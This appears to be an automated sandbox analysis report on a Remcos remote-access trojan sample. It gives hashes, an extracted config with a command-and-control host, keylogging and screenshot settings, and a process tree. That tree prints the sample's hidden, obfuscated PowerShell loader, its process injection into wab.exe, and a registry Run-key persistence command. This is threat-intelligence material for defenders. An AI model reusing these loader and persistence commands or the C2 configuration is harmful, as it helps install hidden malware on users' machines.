Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 09/07/2024, 10:05
Static task: static1
Behavioral task: behavioral1 (sample MalwareBazaar.exe, resource win7-20240708-en)
Behavioral task: behavioral2 (sample MalwareBazaar.exe, resource win10v2004-20240704-en)
General
Target: MalwareBazaar.exe
Size: 432KB
MD5: a35683ad12f004d512b53db7e56c0f1e
SHA1: b374ded49f0cbb44d62eacc4559a0599fc8e7693
SHA256: f15598708dc31075551274589e74d332be05fdd17c30c61605758aba3a6c7848
SHA512: 4dcf4304c9e78dbc8d10b651b7b2d05f57afb6a48cb4171e424aad4ec85b088d038a5a74c657d9160e75c9c4ec96cca820c859affde6fadef463e87fb5d2c576
SSDEEP: 12288:bgoBof8NmB40NiOzwwbbihF1EbdLPrsHTbqDDR6:Cf8NmuizL8uouHc
Malware Config
Extracted family: remcos
RemoteHost: newskingdomz.live:22330
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-5DIOEW
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
  pid 2372 powershell.exe
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\\Dandyishly\\').Gunnysacks;%Overimportance% ($Fingerboard)"
  Process: reg.exe
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  pid 2800 wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid 2372 powershell.exe
  pid 2800 wab.exe
- Suspicious use of SetThreadContext (1 IoCs)
  PID 2372 set thread context of 2800 (pid 2372 powershell.exe, procid_target 34)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTPs, 1 IoCs)
  pid 2896 reg.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid 2372 powershell.exe (8 occurrences)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  pid 2372 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Token: SeDebugPrivilege, pid 2372 powershell.exe
- Suspicious use of WriteProcessMemory (18 IoCs)
  PID 2556 wrote to memory of 2372 (pid 2556 MalwareBazaar.exe, procid_target 30), 4 occurrences
  PID 2372 wrote to memory of 2800 (pid 2372 powershell.exe, procid_target 34), 6 occurrences
  PID 2800 wrote to memory of 2784 (pid 2800 wab.exe, procid_target 35), 4 occurrences
  PID 2784 wrote to memory of 2896 (pid 2784 cmd.exe, procid_target 37), 4 occurrences
Processes
Level 1: C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe (PID 2556)
  command line: "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
  - Suspicious use of WriteProcessMemory
  Level 2: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2372)
    command line: "powershell.exe" -windowstyle hidden " $Debutromanen151=cat 'C:\Users\Admin\AppData\Local\problemlst\capsulogenous\Dicyema.Bra';$Postekspeditioner=$Debutromanen151.substring(50811,3);.$Postekspeditioner($Debutromanen151)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Program Files (x86)\windows mail\wab.exe (PID 2800)
      command line: "C:\Program Files (x86)\windows mail\wab.exe"
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
      Level 4: C:\Windows\SysWOW64\cmd.exe (PID 2784)
        command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\Dandyishly\').Gunnysacks;%Overimportance% ($Fingerboard)"
        - Suspicious use of WriteProcessMemory
        Level 5: C:\Windows\SysWOW64\reg.exe (PID 2896)
          command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Overimportance% -windowstyle minimized $Fingerboard=(Get-ItemProperty -Path 'HKCU:\Dandyishly\').Gunnysacks;%Overimportance% ($Fingerboard)"
          - Adds Run key to start application
          - Modifies registry key
Network
MITRE ATT&CK Enterprise v15